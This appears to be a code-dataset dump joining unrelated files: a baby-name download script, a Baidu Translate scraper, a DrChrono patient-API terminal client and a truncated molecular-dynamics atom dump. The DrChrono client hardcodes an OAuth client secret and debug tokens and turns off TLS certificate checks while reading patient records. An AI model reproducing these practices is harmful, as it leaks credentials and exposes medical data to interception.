5476d32819913f1e2e7c00acefab8291cbb72934 | 69636805a67ed244e13d61d838b56791018dee62 | /exercises/0013-sorted-names/a.py | a7fab637a9477ecdb1851e2b96ca69d16d3a6c27 | [] | no_license | anacrochas1/compciv-2016 | 2176306d774642f7d9a22f02c9d6a599a9942a18 | abd94d0bfcc6c1612ada06f3f563c0764b2fe2b9 | refs/heads/master | 2021-01-18T21:09:33.755755 | 2016-06-02T05:54:18 | 2016-06-02T05:54:18 | 49,533,363 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 625 | py | import requests
import os
if not os.path.exists("tempdata"):
os.makedirs("tempdata")
if not os.path.exists("0013-sorted-names/tempdata"):
os.makedirs("0013-sorted-names/tempdata")
burl = 'http://stash.compciv.org/ssa_baby_names/ssa-babynames-nationwide-2014.txt'
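# Each line of the SSA file is expected to look like "name,sex,count"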
resp = requests.get(burl)
bname = "tempdata/ssa-babynames-nationwide-2014.txt"
bfile = open(bname, 'wb')
bfile.write(resp.content)
bfile.close()
# number of characters
bname = os.path.join('tempdata', 'ssa-babynames-nationwide-2014.txt')
blink = open(bname, 'r')
count_letters = len(blink.read())
blink.close()
print("There are", count_letters, "characters in", bname)
| [
"[email protected]"
] | |
94701c45eae3bf2704f4487b4dc17c05e69b14a1 | 54f2d0d51d7e422e04572da271b83cf35d7c597c | /Reptile/Demo01/实战案例/Demo02破解百度翻译/破解百度翻译.py | 2a1a734ac5d703a64cb1ed078dd4bff8b4f4fcd9 | [] | no_license | wangzilong2019/PythonReptile | 875a3b45369d129b28caf8aa1c286d2dea769f7f | e8d8acc98ebe09997a8f469c8901e7ca9d0411b5 | refs/heads/main | 2023-02-11T23:11:05.991416 | 2021-01-05T15:35:06 | 2021-01-05T15:35:06 | 326,437,983 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,037 | py | import requests
import json
if __name__ == "__main__":
    # 1. Specify the URL; note it comes from the captured network request, not straight from the page
post_url = 'https://fanyi.baidu.com/sug'
    # 2. Spoof the User-Agent (UA)
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'
}
    # 3. Build the POST parameters (handled the same way as for GET)
word = input('enter a word:')
data = {
'kw':word
}
    # 4. Send the request
response = requests.post(url=post_url, data=data, headers=headers)
    # 5. Read the response data (.json() returns an object and should only be used when the response really is JSON)
dic_obj = response.json()
    # 6. Persist the result to disk
    fileName = word + '.json'
    # ensure_ascii=False keeps the Chinese characters readable instead of ASCII escapes
    with open(fileName, 'w', encoding='utf-8') as fp:
        json.dump(dic_obj, fp=fp, ensure_ascii=False)
    print('over!!!')
# ==== /drchrono-terminal.py (YiqinZhang/DrChrono) ====
import requests, json, datetime, pytz, subprocess, sys, urllib3
urllib3.disable_warnings()
def main_app(access_token, refresh_token):
doc_url = 'https://app.drchrono.com/api/doctors'
json_res = make_request(doc_url, access_token)
doc_id = json_res['results'][0]['id']
doc_firstname = json_res['results'][0]['first_name']
doc_lastname = json_res['results'][0]['last_name']
    while True:
print('---------------\nHello, Dr. ' + doc_lastname + '!\n')
print('1. Print all patients (lengthy!)\n2. Print doctor information\n3. Search for a patient\n\n0. Exit\n\n')
option = input('DrDash Terminal > ')
if option=='0':
break
elif option=='1':
test_api_url = 'https://app.drchrono.com/api/patients'
json_res = make_request(test_api_url, access_token)
for i in range(len(json_res['results'])):
for key, value in json_res['results'][i].items():
print(key, ":", value)
elif option=='2':
test_api_url = 'https://app.drchrono.com/api/doctors'
json_res = make_request(test_api_url, access_token)
for i in range(len(json_res['results'])):
print('\n')
for key, value in json_res['results'][i].items():
print(key, ":", value)
elif option=='3':
tekr = 0
searchres = []
searchstring = input("Enter the search string: ")
test_api_url = 'https://app.drchrono.com/api/patients'
json_res = make_request(test_api_url, access_token)
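            # Scan every patient record for a case-insensitive first/last-name match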
for i in range(len(json_res['results'])):
for key, value in json_res['results'][i].items():
if key=='first_name' or key=='last_name':
newval = value.lower()
                        if searchstring.lower() == newval:
searchres.insert(tekr, json_res['results'][i]['first_name'] + " " + json_res['results'][i]['last_name'])
tekr = tekr + 1
length = len(searchres)
if length < 1:
print("No results")
else:
print("Found " + str(length) + " result(s)")
for i in range(length):
print(searchres[i])
else:
print('unrecognized command')
# print(api_call_response.text)
def make_request(url, access_token):
api_call_headers = {'Authorization': 'Bearer ' + access_token}
api_call_response = requests.get(url, headers=api_call_headers, verify=False)
api_json = api_call_response.json()
return api_json
print("DrDash 1.01")
print("----------")
answer = input("Are you logged in? (yes/no/debug/exit): ")
if answer=='yes':
access_token = input('access_token: ')
refresh_token = input('refresh token: ')
main_app(access_token, refresh_token)
elif answer=='no':
code = input('code: ')
response = requests.post('https://drchrono.com/o/token/', data={
'code': code,
'grant_type': 'authorization_code',
'redirect_uri': 'https://drdash.herokuapp.com/',
'client_id': 'gCVCP45fvAZqwlQvB6d4CUqEFlonrXTCjbr90BLm',
'client_secret': 'ZvfvYGFNkabOPiLhQYlxacUWS8c1mA6Sc8Ec0XEaPhaYBCXMy1l89qyXDqMA8XbAQCHmnfuEf6BchB9WGBaeTTkpRe4B7Y9HlJVbAIR1NLVmkpwXQ3b0Vh3ax1LIQM3R',
})
response.raise_for_status()
data = response.json()
# Save these in your database associated with the user
access_token = data['access_token']
refresh_token = data['refresh_token']
expires_timestamp = datetime.datetime.now(pytz.utc) + datetime.timedelta(seconds=data['expires_in'])
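    # Hand the new tokens off to the terminal session, as the other branches do
    main_app(access_token, refresh_token)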
elif answer=='debug':
main_app('CCdp8mvLYMWNaVWRodrgx95BtaAkt6', 'ETQUgVbs6SmYWu6p2u82y9nF0vw3hX')
elif answer=='exit':
print('exiting...')
else:
print(answer + ' : command not recognized')
| [
"[email protected]"
] | |
1b71e36135253692cdf852abf5a83de796cd8cc8 | 649bd422025e421d86025743eac324c9b882a2e8 | /exam/1_three-dimensional_atomic_system/dump/phasetrans/temp69_9500.py | 5d980c46f0efa2cef312dec32e7fecc008b51e79 | [] | no_license | scheuclu/atom_class | 36ddee1f6a5995872e858add151c5942c109847c | 0c9a8c63d9b38898c1869fe8983126cef17662cd | refs/heads/master | 2021-01-21T10:52:28.448221 | 2017-03-07T23:04:41 | 2017-03-07T23:04:41 | 83,489,471 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 68,936 | py | ITEM: TIMESTEP
9500
ITEM: NUMBER OF ATOMS
2048
ITEM: BOX BOUNDS pp pp pp
5.1115624967957274e-01 4.6688843750315684e+01
5.1115624967957274e-01 4.6688843750315684e+01
5.1115624967957274e-01 4.6688843750315684e+01
ITEM: ATOMS id type xs ys zs
8 1 0.122891 0.0692552 0.0594138
35 1 0.0660705 0.12858 0.0643852
130 1 0.0658427 0.0673858 0.123046
165 1 0.125365 0.130345 0.130941
133 1 0.125545 0.00121744 0.128155
3 1 0.0632227 0.00654306 0.0643839
12 1 0.243812 0.0602803 0.0636837
39 1 0.186959 0.121558 0.0629399
43 1 0.311473 0.121968 0.0644408
134 1 0.182138 0.0649791 0.127788
138 1 0.310192 0.0608961 0.1163
169 1 0.244189 0.129378 0.126825
11 1 0.307325 0.997075 0.0609899
7 1 0.179738 0.0100173 0.0673374
1058 1 0.0611889 0.690854 0.00419769
16 1 0.377334 0.0668562 0.0670176
47 1 0.440218 0.123565 0.0591307
142 1 0.436804 0.0586052 0.123478
173 1 0.376802 0.125347 0.124431
15 1 0.442098 0.994353 0.0590983
561 1 0.500103 0.125908 0.500951
1037 1 0.369477 0.497087 0.00272885
46 1 0.438795 0.18282 0.00223036
40 1 0.118129 0.188076 0.0620903
67 1 0.0608542 0.244861 0.0591712
72 1 0.124655 0.311307 0.0516718
162 1 0.0616593 0.185579 0.12356
194 1 0.0724284 0.313293 0.118095
197 1 0.119742 0.249505 0.12582
1026 1 0.0644562 0.559449 0.00130125
13 1 0.374721 0.997235 0.011579
292 1 0.000318054 0.187638 0.312222
180 1 0.496566 0.181695 0.187547
44 1 0.247148 0.189428 0.0584788
71 1 0.183709 0.255219 0.0593705
75 1 0.311256 0.25076 0.068968
76 1 0.24893 0.315336 0.0660112
166 1 0.18442 0.190042 0.123311
170 1 0.316233 0.18439 0.1256
198 1 0.182118 0.308357 0.116634
201 1 0.251013 0.251657 0.123763
202 1 0.306313 0.317439 0.123227
1642 1 0.311605 0.937561 0.497998
225 1 0.00284089 0.37001 0.126252
48 1 0.37271 0.179881 0.0565739
79 1 0.444606 0.247488 0.0705538
80 1 0.370877 0.307496 0.0700967
174 1 0.439368 0.181746 0.118777
205 1 0.375402 0.242129 0.124437
206 1 0.435013 0.3167 0.127336
41 1 0.25075 0.125873 0.00450461
1094 1 0.18647 0.812715 0.000628729
1133 1 0.367976 0.881306 0.0117022
1030 1 0.180427 0.563176 0.0034469
1519 1 0.435042 0.865798 0.438758
99 1 0.0588737 0.382945 0.0582983
104 1 0.130679 0.438966 0.0596712
226 1 0.0602509 0.439643 0.124907
229 1 0.12344 0.373014 0.113081
1027 1 0.0601871 0.495281 0.0558824
1157 1 0.119064 0.502025 0.126956
36 1 0.00176503 0.18938 0.060605
1057 1 0.00400782 0.629594 0.00770463
1517 1 0.379917 0.878134 0.369952
103 1 0.185014 0.377962 0.0534014
107 1 0.309025 0.37151 0.0579238
108 1 0.250912 0.440798 0.0599089
230 1 0.185484 0.442755 0.11462
233 1 0.250705 0.377531 0.123561
234 1 0.311321 0.440869 0.125894
1377 1 0.00373547 0.88021 0.245895
1038 1 0.432289 0.568535 0.00412378
111 1 0.432995 0.377075 0.0634072
112 1 0.368265 0.438859 0.0674193
237 1 0.36443 0.376133 0.126201
238 1 0.435957 0.436005 0.122848
1518 1 0.445988 0.930152 0.368946
1380 1 0.00448556 0.938782 0.307346
1130 1 0.306294 0.936537 0.0074403
1508 1 0.00444635 0.938635 0.430168
1409 1 0.000965949 0.505048 0.377525
1032 1 0.121464 0.558078 0.0686545
1059 1 0.0647454 0.626865 0.0632443
1154 1 0.0570682 0.564228 0.12363
1189 1 0.113029 0.624263 0.134233
353 1 -0.00101609 0.381731 0.248108
1034 1 0.310661 0.563398 0.00224086
1345 1 0.00310938 0.752781 0.260545
1161 1 0.246789 0.501402 0.123703
1035 1 0.31172 0.50192 0.0638399
1031 1 0.188416 0.503345 0.0580211
1036 1 0.253342 0.56366 0.0628048
1063 1 0.17913 0.618739 0.0644495
1067 1 0.306665 0.627804 0.0609208
1158 1 0.188598 0.560545 0.123597
1162 1 0.31073 0.5572 0.124739
1193 1 0.24668 0.628426 0.1261
109 1 0.372917 0.370485 0.00131538
449 1 0.0070164 0.250028 0.374769
1165 1 0.380461 0.507908 0.127661
1039 1 0.434407 0.486688 0.0619436
1040 1 0.371237 0.564827 0.0629547
1071 1 0.439733 0.630067 0.0594213
1166 1 0.438101 0.558009 0.119171
1197 1 0.372486 0.620397 0.118592
77 1 0.372243 0.250588 0.00538345
148 1 0.500077 0.0604209 0.185953
1064 1 0.125075 0.689415 0.0651019
1091 1 0.062852 0.748905 0.0671635
1096 1 0.129022 0.81093 0.069404
1186 1 0.0628945 0.691888 0.125337
1218 1 0.0683622 0.814699 0.131978
1221 1 0.132018 0.746491 0.131109
1361 1 0.50111 0.742428 0.247913
1297 1 0.489319 0.498137 0.249378
1122 1 0.0586929 0.935999 0.00582512
1068 1 0.244654 0.681695 0.0677134
1095 1 0.18813 0.744281 0.0660509
1099 1 0.309407 0.759184 0.067671
1100 1 0.241755 0.811956 0.0704696
1190 1 0.182468 0.679855 0.123067
1194 1 0.315176 0.685655 0.127667
1222 1 0.182361 0.815143 0.126975
1225 1 0.250639 0.74837 0.128419
1226 1 0.30889 0.812869 0.12753
1217 1 0.000906483 0.747758 0.130945
1570 1 0.0664239 0.685133 0.495725
1108 1 0.499365 0.815735 0.0672561
321 1 0.00362257 0.252631 0.252538
1072 1 0.370387 0.691524 0.0601836
1103 1 0.441516 0.755396 0.0667927
1104 1 0.374072 0.815658 0.0633928
1198 1 0.428047 0.690209 0.120405
1229 1 0.374592 0.753377 0.126017
1230 1 0.441998 0.815816 0.136328
1476 1 0.00163148 0.809727 0.433441
514 1 0.0578784 0.0621345 0.496763
1520 1 0.377106 0.937965 0.432814
81 1 0.499487 0.254907 0.00521653
305 1 0.49722 0.11948 0.255483
1249 1 0.000547884 0.8811 0.12106
1123 1 0.0640506 0.873165 0.0627538
1128 1 0.123176 0.940343 0.0606808
1250 1 0.0687508 0.940769 0.119142
1253 1 0.1295 0.878837 0.130497
137 1 0.248428 0.00488833 0.125315
1127 1 0.185816 0.872164 0.0687947
1131 1 0.3106 0.869434 0.0699472
1132 1 0.236828 0.940497 0.0676197
1254 1 0.184686 0.937085 0.129384
1257 1 0.25257 0.87187 0.129532
1258 1 0.311434 0.935762 0.125171
1061 1 0.124692 0.627917 0.000696627
1638 1 0.18862 0.937198 0.499721
141 1 0.368451 0.00291347 0.123479
1135 1 0.43602 0.877766 0.0638614
1136 1 0.378984 0.938132 0.0672292
1261 1 0.377402 0.869212 0.133661
1262 1 0.444203 0.940373 0.123751
1098 1 0.310403 0.810111 0.0012677
193 1 0.00985276 0.248772 0.122234
136 1 0.123987 0.0650094 0.189271
163 1 0.0609466 0.120713 0.185811
258 1 0.0616212 0.055806 0.243628
264 1 0.118879 0.0667645 0.309633
291 1 0.0577509 0.128086 0.307905
293 1 0.12091 0.126759 0.245195
131 1 0.0658527 0.00112155 0.187332
261 1 0.129675 0.0058 0.246439
1329 1 0.496981 0.624001 0.244397
9 1 0.246144 0.996994 0.0013473
140 1 0.254085 0.0642384 0.186466
167 1 0.186729 0.131153 0.188672
171 1 0.311465 0.12642 0.185214
262 1 0.189307 0.0692637 0.245001
266 1 0.309472 0.0620892 0.245564
268 1 0.242904 0.0693117 0.308758
295 1 0.180102 0.124281 0.308676
297 1 0.25563 0.127511 0.251227
299 1 0.31571 0.130019 0.311196
263 1 0.186562 0.00234539 0.313617
135 1 0.18615 0.0071088 0.187539
267 1 0.319266 0.00496826 0.312297
144 1 0.371295 0.0604511 0.185945
175 1 0.434801 0.117591 0.189761
270 1 0.445401 0.0553838 0.250253
272 1 0.37665 0.0651112 0.304923
301 1 0.377653 0.125512 0.247208
303 1 0.437144 0.115348 0.312426
271 1 0.438706 0.000201615 0.312219
397 1 0.377096 0.00292728 0.3713
6 1 0.184441 0.0657506 0.0019139
212 1 0.500406 0.313438 0.184574
1044 1 0.494863 0.551945 0.0618352
168 1 0.12234 0.192957 0.187068
195 1 0.0594346 0.251436 0.187015
200 1 0.121477 0.310043 0.182125
290 1 0.0562096 0.188119 0.246029
296 1 0.116983 0.18813 0.306482
322 1 0.0637774 0.32253 0.255528
323 1 0.0613232 0.257572 0.311369
325 1 0.1226 0.255866 0.245997
328 1 0.128551 0.307444 0.309784
172 1 0.245162 0.191663 0.193089
199 1 0.19082 0.248795 0.186776
203 1 0.308425 0.257048 0.188303
204 1 0.242225 0.316535 0.179734
294 1 0.18462 0.186519 0.2484
298 1 0.317905 0.194896 0.244338
300 1 0.249541 0.185125 0.317411
326 1 0.189674 0.310632 0.240441
327 1 0.178339 0.241297 0.315909
329 1 0.249352 0.245683 0.258235
330 1 0.313291 0.312514 0.253059
331 1 0.311074 0.245289 0.316961
332 1 0.258362 0.308838 0.313361
176 1 0.377425 0.187068 0.193835
207 1 0.443337 0.244175 0.184667
208 1 0.377584 0.30663 0.190059
302 1 0.441984 0.191504 0.250719
304 1 0.3887 0.186787 0.316106
333 1 0.378248 0.253559 0.248008
334 1 0.441101 0.317418 0.250745
335 1 0.444821 0.253209 0.314709
336 1 0.373095 0.307898 0.314281
1069 1 0.371379 0.627153 0.00377777
227 1 0.0584811 0.376194 0.185527
232 1 0.126223 0.431904 0.179881
354 1 0.0679323 0.440019 0.243481
355 1 0.0652936 0.381296 0.310579
357 1 0.123709 0.370198 0.247321
360 1 0.123861 0.439554 0.308001
1283 1 0.0570607 0.496168 0.308982
1285 1 0.122237 0.501422 0.251842
231 1 0.184319 0.374934 0.179043
235 1 0.306574 0.379635 0.190143
236 1 0.248168 0.437858 0.195515
358 1 0.183236 0.429529 0.251604
359 1 0.18612 0.367941 0.313278
361 1 0.24801 0.372312 0.247443
362 1 0.312097 0.435023 0.255183
363 1 0.314896 0.368059 0.318842
364 1 0.247957 0.429198 0.311272
1291 1 0.318397 0.496664 0.309569
1159 1 0.187938 0.488857 0.190216
239 1 0.431458 0.375198 0.190391
240 1 0.376268 0.436441 0.193677
365 1 0.378308 0.371566 0.259519
366 1 0.437117 0.432063 0.258542
367 1 0.442737 0.370473 0.319265
368 1 0.371657 0.433134 0.314859
1167 1 0.434003 0.491315 0.186216
1293 1 0.382812 0.498235 0.248692
1295 1 0.444528 0.503469 0.318568
1515 1 0.31731 0.87668 0.432193
1155 1 0.0581565 0.499508 0.191349
1160 1 0.122699 0.560468 0.191347
1187 1 0.0613002 0.625322 0.190782
1282 1 0.0645446 0.564985 0.246204
1288 1 0.125114 0.562941 0.315179
1315 1 0.0723561 0.624112 0.302033
1317 1 0.135365 0.625226 0.252953
1163 1 0.307918 0.500259 0.190197
1289 1 0.250447 0.501533 0.251385
1287 1 0.188406 0.495475 0.315679
1164 1 0.245505 0.562589 0.184702
1191 1 0.181895 0.619937 0.188987
1195 1 0.310631 0.616348 0.181685
1286 1 0.187936 0.56045 0.250258
1290 1 0.315099 0.564982 0.255034
1292 1 0.251809 0.558748 0.31297
1319 1 0.182947 0.624692 0.321314
1321 1 0.246222 0.625442 0.254702
1323 1 0.311919 0.622046 0.320433
1511 1 0.185732 0.875869 0.444462
1516 1 0.251629 0.948997 0.437168
1168 1 0.37109 0.560881 0.188393
1199 1 0.435869 0.619282 0.177456
1294 1 0.438447 0.561858 0.247485
1296 1 0.379597 0.565741 0.316607
1325 1 0.381041 0.625463 0.249178
1327 1 0.445488 0.628156 0.31602
1514 1 0.316729 0.940896 0.375567
1513 1 0.253676 0.88661 0.375539
1192 1 0.12002 0.68435 0.187276
1219 1 0.063317 0.75069 0.183652
1224 1 0.122879 0.82223 0.196096
1314 1 0.0636973 0.682965 0.249217
1320 1 0.129603 0.688176 0.313815
1346 1 0.0669546 0.815863 0.255792
1347 1 0.0615069 0.751418 0.31875
1349 1 0.124737 0.743975 0.245825
1352 1 0.130553 0.810489 0.315963
1185 1 0.00111593 0.624261 0.124467
1196 1 0.248256 0.686206 0.188205
1223 1 0.18561 0.754297 0.189742
1227 1 0.310855 0.754423 0.191879
1228 1 0.248007 0.81571 0.191192
1318 1 0.188002 0.684677 0.253328
1322 1 0.313007 0.68669 0.256427
1324 1 0.249513 0.684527 0.314034
1350 1 0.187634 0.818935 0.256271
1351 1 0.188083 0.750244 0.312902
1353 1 0.250234 0.747796 0.249577
1354 1 0.305969 0.816266 0.250119
1355 1 0.314881 0.749182 0.319014
1356 1 0.256117 0.81309 0.316444
196 1 0.00133587 0.314031 0.188279
1200 1 0.376885 0.687843 0.183465
1231 1 0.434996 0.749544 0.184511
1232 1 0.37431 0.81492 0.193954
1326 1 0.437296 0.68043 0.251144
1328 1 0.374986 0.680878 0.313177
1357 1 0.369748 0.746614 0.251181
1358 1 0.430186 0.80511 0.251429
1359 1 0.436595 0.743978 0.306202
1360 1 0.377354 0.813399 0.313582
1169 1 0.496795 0.496026 0.122202
1492 1 0.495264 0.808335 0.439008
1510 1 0.189285 0.937625 0.379654
259 1 0.0616108 0.00609116 0.313343
1251 1 0.0604663 0.881148 0.185017
1256 1 0.123205 0.939153 0.188512
1378 1 0.0671411 0.944578 0.252328
1379 1 0.0621708 0.877223 0.311291
1381 1 0.130095 0.885386 0.248424
1384 1 0.129372 0.946987 0.308022
139 1 0.310667 -0.000586023 0.188049
265 1 0.243492 0.00586126 0.250032
1255 1 0.192098 0.881365 0.189305
1259 1 0.310993 0.877608 0.184341
1260 1 0.250688 0.941238 0.183361
1382 1 0.193861 0.94295 0.244052
1383 1 0.190004 0.883012 0.310358
1385 1 0.252414 0.87783 0.245933
1386 1 0.312433 0.947776 0.25524
1387 1 0.315165 0.878357 0.311876
1388 1 0.252746 0.942551 0.313543
269 1 0.378639 0.0063057 0.248939
497 1 0.49931 0.379061 0.381495
143 1 0.435347 0.00163969 0.186248
1263 1 0.439435 0.875724 0.195555
1264 1 0.379239 0.940204 0.187056
1389 1 0.375194 0.87784 0.253987
1390 1 0.440428 0.939508 0.254421
1391 1 0.439072 0.873062 0.309766
1392 1 0.375403 0.9424 0.313644
1602 1 0.0616352 0.814 0.498601
549 1 0.128528 0.132308 0.497121
386 1 0.0569733 0.0629739 0.370106
392 1 0.12257 0.0654176 0.43596
419 1 0.0628187 0.124849 0.444248
421 1 0.121267 0.131433 0.382392
387 1 0.06656 0.00118361 0.440437
1076 1 0.494326 0.692112 0.061884
110 1 0.437572 0.436369 0.00138385
395 1 0.313731 0.995197 0.439467
391 1 0.180295 0.00335171 0.439254
393 1 0.252264 0.00485426 0.372846
390 1 0.181514 0.0691291 0.374041
394 1 0.316758 0.0636891 0.370396
396 1 0.247806 0.0592955 0.437547
423 1 0.189395 0.119644 0.434453
425 1 0.25293 0.125275 0.375101
427 1 0.309782 0.127389 0.432472
164 1 0.00204353 0.197459 0.185363
526 1 0.437304 0.060097 0.497528
399 1 0.441303 0.995603 0.430014
129 1 0.00162282 0.00485417 0.123441
398 1 0.444214 0.062927 0.378378
400 1 0.37495 0.055126 0.433773
429 1 0.368466 0.126177 0.374709
431 1 0.426671 0.124337 0.437632
1649 1 0.497927 0.87405 0.496675
1252 1 0.00656793 0.944213 0.182436
389 1 0.119657 0.000738156 0.374961
1070 1 0.435531 0.694115 0.000838219
418 1 0.065212 0.194248 0.371281
424 1 0.119539 0.192901 0.439251
450 1 0.0594098 0.313288 0.374641
451 1 0.0574077 0.252246 0.443657
453 1 0.120646 0.256322 0.369478
456 1 0.122796 0.31363 0.436414
522 1 0.312083 0.0618429 0.498301
1456 1 0.373953 0.687342 0.433841
1450 1 0.301254 0.683802 0.378045
422 1 0.185853 0.179756 0.380374
426 1 0.31344 0.189863 0.37896
428 1 0.250628 0.192116 0.439584
454 1 0.188528 0.312496 0.374727
455 1 0.181208 0.256562 0.430847
457 1 0.245626 0.246432 0.373248
458 1 0.306007 0.306806 0.38702
459 1 0.30865 0.251428 0.447595
460 1 0.244771 0.310343 0.44141
1125 1 0.124441 0.868058 0.00826625
1507 1 0.063721 0.877165 0.437489
1610 1 0.316899 0.819566 0.492519
430 1 0.44137 0.189169 0.379203
432 1 0.373069 0.188309 0.433828
461 1 0.373603 0.251829 0.379882
462 1 0.442832 0.309786 0.375519
463 1 0.436189 0.250954 0.434363
464 1 0.373468 0.316529 0.437557
1126 1 0.183194 0.932808 0.00135053
485 1 0.126966 0.369934 0.371827
488 1 0.127668 0.441392 0.437181
483 1 0.0616457 0.372156 0.432483
482 1 0.0596638 0.431875 0.373015
1413 1 0.124404 0.501945 0.377146
1506 1 0.063731 0.941698 0.372346
1484 1 0.251597 0.816295 0.433975
1487 1 0.435496 0.751892 0.442632
492 1 0.251616 0.439107 0.439855
489 1 0.252561 0.371527 0.373648
486 1 0.183323 0.433009 0.375975
487 1 0.183264 0.36999 0.443215
491 1 0.315599 0.376345 0.44278
490 1 0.31018 0.436097 0.375515
1419 1 0.307041 0.497635 0.438737
1415 1 0.190742 0.497207 0.43716
1417 1 0.251529 0.491793 0.373438
1485 1 0.386539 0.745974 0.369904
1573 1 0.129532 0.619466 0.499045
1488 1 0.374448 0.8123 0.4301
1454 1 0.443213 0.681218 0.380486
494 1 0.439604 0.433858 0.369225
495 1 0.436621 0.373104 0.439822
496 1 0.373932 0.440714 0.436066
493 1 0.378481 0.377805 0.381454
622 1 0.436843 0.440384 0.499497
1421 1 0.379043 0.496952 0.374429
1423 1 0.433981 0.499768 0.441967
1509 1 0.121164 0.879743 0.371557
1188 1 0.00279276 0.693344 0.191499
1411 1 0.0595898 0.498299 0.440554
1410 1 0.0615706 0.554786 0.370013
1416 1 0.125117 0.558166 0.434881
1443 1 0.0590573 0.625885 0.435621
1445 1 0.124313 0.617048 0.375446
337 1 0.497296 0.250873 0.251919
1449 1 0.244047 0.625053 0.376423
1451 1 0.307609 0.620311 0.434374
1420 1 0.24799 0.556653 0.437374
1447 1 0.185528 0.628562 0.435557
1414 1 0.188399 0.557931 0.376845
1418 1 0.314542 0.556516 0.375672
1486 1 0.438282 0.818741 0.373548
241 1 0.501133 0.376661 0.121845
1605 1 0.120254 0.748418 0.50211
4 1 0.00638131 0.0682505 0.0639101
1422 1 0.433502 0.561262 0.382869
1455 1 0.437154 0.626248 0.437778
1424 1 0.370078 0.557397 0.439843
1453 1 0.37119 0.627525 0.382438
1512 1 0.128865 0.939673 0.434288
1474 1 0.0600866 0.818683 0.363121
1480 1 0.125936 0.816587 0.439082
1475 1 0.0673812 0.754322 0.43341
1442 1 0.0623344 0.688443 0.371449
1477 1 0.127569 0.748902 0.375008
1448 1 0.120712 0.68127 0.429473
1060 1 -0.000875945 0.689024 0.067351
1483 1 0.307785 0.749735 0.434794
1479 1 0.185944 0.74914 0.436479
1482 1 0.311365 0.814324 0.374145
1446 1 0.187843 0.685927 0.375991
1452 1 0.247078 0.689672 0.437787
1481 1 0.250239 0.753047 0.371383
1478 1 0.188043 0.822309 0.371119
500 1 0.498834 0.439723 0.443634
1220 1 0.00683256 0.816598 0.192867
1412 1 0.00173819 0.561304 0.443987
401 1 0.50122 0.000519874 0.373717
369 1 0.499991 0.375315 0.24427
289 1 0.00260733 0.12673 0.249401
417 1 0.00406402 0.130338 0.378279
1124 1 0.000437057 0.943592 0.0638882
433 1 0.500489 0.127664 0.376013
1201 1 0.498046 0.630237 0.125363
1489 1 0.493322 0.751008 0.377614
525 1 0.380361 0.99466 0.494533
1062 1 0.191046 0.6891 0.00493153
1204 1 0.492101 0.691546 0.184467
1105 1 0.497644 0.746893 0.00396259
518 1 0.190327 0.0667529 0.498173
554 1 0.312852 0.188808 0.497126
33 1 0.00268749 0.127788 0.00173414
581 1 0.13337 0.247866 0.500551
617 1 0.248391 0.378579 0.499618
1581 1 0.372222 0.627381 0.491403
1546 1 0.313301 0.561468 0.500429
1097 1 0.246554 0.75732 0.00766128
1582 1 0.434017 0.688954 0.494486
1089 1 0.00123369 0.748198 0.000774587
613 1 0.118774 0.369442 0.498904
558 1 0.436757 0.187235 0.491404
1549 1 0.37733 0.500243 0.499677
625 1 0.498171 0.377741 0.499274
106 1 0.309753 0.433479 0.00664018
553 1 0.253945 0.12693 0.494205
1574 1 0.185185 0.687926 0.497632
10 1 0.304263 0.0653689 0.000684848
78 1 0.436952 0.311512 0.00407307
1073 1 0.497823 0.630508 0.00787249
1101 1 0.371692 0.754779 0.00381889
1033 1 0.25667 0.501087 0.00483557
1129 1 0.243436 0.870458 0.00983062
73 1 0.246269 0.248767 0.00376876
1538 1 0.0638315 0.565363 0.497159
74 1 0.306516 0.307036 0.000685393
1578 1 0.31392 0.686934 0.494658
1634 1 0.0644011 0.935675 0.494333
1633 1 0.00189301 0.869404 0.498968
1102 1 0.440004 0.807531 0.00589282
1090 1 0.0587013 0.807969 0.0046384
1550 1 0.438842 0.566069 0.492627
1569 1 0.00053881 0.623086 0.495578
1066 1 0.30522 0.688183 0.00377618
520 1 0.123977 0.0604492 0.555822
547 1 0.0633349 0.125608 0.557356
642 1 0.0732341 0.0513143 0.619561
677 1 0.123168 0.117595 0.614814
515 1 0.0634356 0.993431 0.558103
868 1 0.00222562 0.441263 0.808863
911 1 0.440651 0.00380783 0.941474
524 1 0.245338 0.0627485 0.559035
551 1 0.181864 0.126405 0.562998
555 1 0.308892 0.127715 0.560079
646 1 0.190035 0.0601268 0.626499
650 1 0.310283 0.0687987 0.624631
681 1 0.24888 0.132101 0.619316
1729 1 0.00724713 0.742191 0.625533
519 1 0.18265 0.00428977 0.562938
649 1 0.25195 0.998338 0.626277
1009 1 0.498802 0.369669 0.879478
528 1 0.370419 0.0618058 0.560166
559 1 0.434484 0.124101 0.562411
654 1 0.441442 0.0663305 0.622524
685 1 0.369453 0.12873 0.621473
653 1 0.376299 0.00649826 0.629925
1540 1 0.000499783 0.561419 0.560258
1545 1 0.249988 0.494315 0.501272
705 1 0.000164435 0.247845 0.624995
552 1 0.119381 0.185298 0.564534
579 1 0.0614591 0.243452 0.566189
584 1 0.125013 0.309455 0.572241
674 1 0.0624132 0.181109 0.625639
706 1 0.0689301 0.311448 0.635596
709 1 0.129435 0.244942 0.630085
1588 1 0.498016 0.684315 0.562069
909 1 0.36896 0.996079 0.882385
1041 1 0.499762 0.492785 0.997675
1572 1 0.00723593 0.683427 0.563257
556 1 0.25256 0.190227 0.564215
583 1 0.187717 0.247759 0.561479
587 1 0.312924 0.252269 0.563568
588 1 0.248308 0.316815 0.567058
678 1 0.181809 0.182664 0.626876
682 1 0.313547 0.187792 0.630659
710 1 0.188993 0.311699 0.631321
713 1 0.249259 0.248523 0.629578
714 1 0.313856 0.317914 0.623597
1873 1 0.498633 0.749157 0.750755
548 1 0.00259737 0.186722 0.564518
560 1 0.374862 0.184811 0.563004
591 1 0.436044 0.256205 0.560094
592 1 0.373457 0.309964 0.560982
686 1 0.436974 0.195353 0.624162
717 1 0.371102 0.251345 0.620679
718 1 0.439043 0.320765 0.629724
2031 1 0.43067 0.8723 0.948336
2032 1 0.373438 0.93251 0.939554
804 1 0.00304562 0.175065 0.805767
1940 1 0.49874 0.564462 0.94466
1953 1 0.0016858 0.624099 0.877641
611 1 0.0611975 0.370101 0.566867
616 1 0.123846 0.435416 0.562907
738 1 0.0627463 0.433134 0.626233
741 1 0.129362 0.373022 0.630593
621 1 0.372616 0.378044 0.503582
582 1 0.190748 0.316598 0.507571
609 1 0.00290878 0.369882 0.501942
